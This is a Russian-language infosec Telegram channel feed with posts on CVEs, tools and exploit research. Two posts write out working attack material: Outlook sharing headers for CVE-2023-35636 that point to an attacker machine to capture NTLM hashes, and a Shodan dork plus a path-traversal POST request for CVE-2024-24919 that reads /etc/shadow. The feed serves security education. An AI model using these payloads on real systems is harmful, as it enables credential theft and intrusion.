Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность
12.6K subscribers
1.81K photos
92 videos
166 files
2.86K links
Все самое полезное по инфобезу в одном канале.

Список наших каналов: https://t.me/proglibrary/9197

Для обратной связи: @proglibrary_feeedback_bot

По рекламе: @proglib_adv
РКН: https://gosuslugi.ru/snet/67ab0e2e75b36e054ef6d5bf
Download Telegram
🤔 Устали сначала собирать, а потом анализировать данные о различных CVE из NVD и других критически важных источников? Команда ProjectDiscovery позаботилась об этом и представила новый инструмент cvemap.

Он предоставляет структурированный и простой в навигации CLI к различным базам данных уязвимостей, а также позволяет выполнить:

✔️ Поиск и запрос набора данных CVE
✔️ Сопоставление CVE с Known Exploited Vulnerabilities Catalog
✔️ Сопоставление CVE и Exploit Prediction Scoring System
✔️ Сопоставление CVE и Common Platform Enumeration
✔️ Сопоставление CVE с PoC'ами на GitHub
✔️ Сопоставление CVE с Nuclei Template
✔️ Сопоставление CVE с отчетами HackerOne

go install github.com/projectdiscovery/cvemap/cmd/cvemap@latest


#news #tools #CVE
😂 CVE-2023-35636

Команда Varonis обнаружила новую багу в функции обмена календарями в Microsoft Outlook, при котором добавление двух заголовков в электронное письмо заставляет Outlook делиться контентом и связываться с указанной машиной, создавая возможность перехвата хэша NTLM v2.

К слову, это новый способ получения NTLM-хэшей среди двух других новых способов: с помощью Windows Performance Analyzer и проводника Windows.

Для тех, кто не знает, NTLM v2 — это криптографический протокол, используемый Windows для аутентификации пользователей на удаленных серверах. Хотя NTLM v2 является более безопасной версией оригинального NTLM, v2 все еще уязвим для атак методом брутфорса и не только.

📌 Те самые заголовки Outlook:

"Content-Class" = "Sharing"
"x-sharing-config-url" = \\(Attacker machine)\a.ics


#pentest #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
😳CVE-2023-5480 в деталях: история одной уязвимости в Google Chrome за 16000$

Всеволод Кокорин, исследователь безопасности в SolidLab, делится историей нахождения уязвимости и описывает технические аспекты, которые привели к её возникновению. Сама уязвимость существовала в течение длительного времени и была устранена в октябре 2023 года.

📌 Вы узнаете про Service Worker + PWA, про аспекты, связанные с Payment Request API и спецификацией JIT-installed воркеров, а также про то, как архитектурные решения в веб-приложениях могут привести к серьезным багам.

👉 Читать

#pentest #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🛠 Шаблоны Nuclei в январе 2024: что нового для этичного хакера

⚡️ За месяц команда ProjectDiscovery и сообщество написали 157 новых шаблонов Nuclei, из которых 36 CVE и 75 для сканирования багов, связанных с локальным повышением привилегий:

CVE-2023-22527: Atlassian Confluence — Remote Code Execution
CVE-2023-44353: Adobe ColdFusion WDDX Deserialization Gadgets
CVE-2023-51467: Apache OFBiz < 18.12.11 — Remote Code Execution
CVE-2023-7028: GitLab — Account Takeover via Password Reset
CVE-2024-0204: Fortra GoAnywhere MFT — Authentication Bypass
CVE-2024-23897: Jenkins < 2.441 — Arbitrary File Read
CVE-2023-50917: MajorDoMo thumb.php — OS Command Injection
CVE-2023-46805: Ivanti ICS — Authentication Bypass
CVE-2023-47211: ManageEngine OpManager — Directory Traversal
CVE-2023-6063: WP Fastest Cache 1.2.2 - Unauthenticated SQL Injection

#news #pentest #bugbounty #CVE
🤦‍♂️🔐 1 февраля этого года компания Ivanti объявила о закрытии серьезных уязвимостей в своих продуктах Ivanti Connect Secure и Ivanti Policy Secure. Эти уязвимости, обнаруженные в декабре 2023 года, уже активно эксплуатировались злоумышленниками, представляя значительную угрозу для VPN-серверов. Сложности с разработкой патча привели к тому, что CISA потребовало отключить уязвимые решения за день до выпуска обновлений. Это уже второй серьезный инцидент с продуктами Ivanti, предыдущий произошел в августе 2023 года.

Команда Volexity обнаружила две уязвимости (CVE-2023-46805 и CVE-2024-21887) в VPN-сервере, позволяющие обходить аутентификацию и выполнять произвольные команды. После публикации информации об уязвимостях количество атак значительно увеличилось. Ivanti предложила временные решения, но некоторые из них были обойдены атакующими. В конечном итоге, для полной защиты требовалась переустановка ПО с нуля и установка патча.

Естественно, команду Assetnote эти уязвимости заинтересовали. Их исследования, реверс прошивки и многое другое — под катом:

⚡️High Signal Detection and Exploitation of Ivanti's Pulse Connect Secure Auth Bypass RCE
⚡️Ivanti's Pulse Connect Secure Auth Bypass Round Two

#pentest #reverse #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
#research #CVE

🔎 Команда исследователей Assetnote представила очередной подробный ресёрч. На этот раз это pre-auth RCE в FortiGate SSLVPN (CVE-2024-21762).

🧰 Под катом вас ждет подробное описание каждого шага: от извлечения бинарей до создания работающего эксплойта👇
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯 Анализ новой уязвимости Linux в nf_tables (CVE-2024-1086)

🤷‍♂️ Ничего такого, просто ядра Linux (5.14–6.7) подвержены уязвимости Local Privilege Escalation. А это самые распространенных ОС Debian и Ubuntu.

Автор написал своего рода исследование, в котором поделился первопричинами уязвимости и универсальным PoC'ом.

Материал отлично подойдет для новичков, которые хотят научиться искать баги в ядре Linux, потому что сложные темы разбиты на разделы (к которым можно вернуться, если совсем непонятно) и написаны простым языком.

👉 Читать

#research #linux #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Все пишут про CVE-2024-24919, и мы напишем.

🔍 Дорк для Shodan: title:"Check Point" ssl:"target"

Эксплуатация👇
POST /clients/MyCRL HTTP/1.1
host: target
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow

#CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯 Хотите хардкора? Читайте разбор уязвимости CVE-2022-24834 в контейнере Redis, работающем на Alpine Linux

Уязвимость затрагивает модуль Lua cjson в серверах Redis <= 7.0.11 и представляет собой переполнение целого числа, которое приводит к большому копированию данных (~350 Мб).

👉 Читать

#CVE #writeup
🌐 Введение в эксплуатацию Chrome

Где одни из самых крупных выплат? Конечно, в браузерах. Читайте подробнее полезные заметки, которые уже переросли в глубокое исследование.

1. Introduction
2. The Chromium Security Architecture
3. The V8 Pipeline
The Parser
The Interpreter - Ignition
The JIT Compiler - TurboFan
The Maglev Compiler
4. Setting up the V8 Debugging Environment
5. CVE-2023-4069 RCA and Walkthrough
6. JIT-Spraying Shellcode
7. Addendum: Version Independent Shellcode
8. Conclusions
9. External References

👉 Читать

#research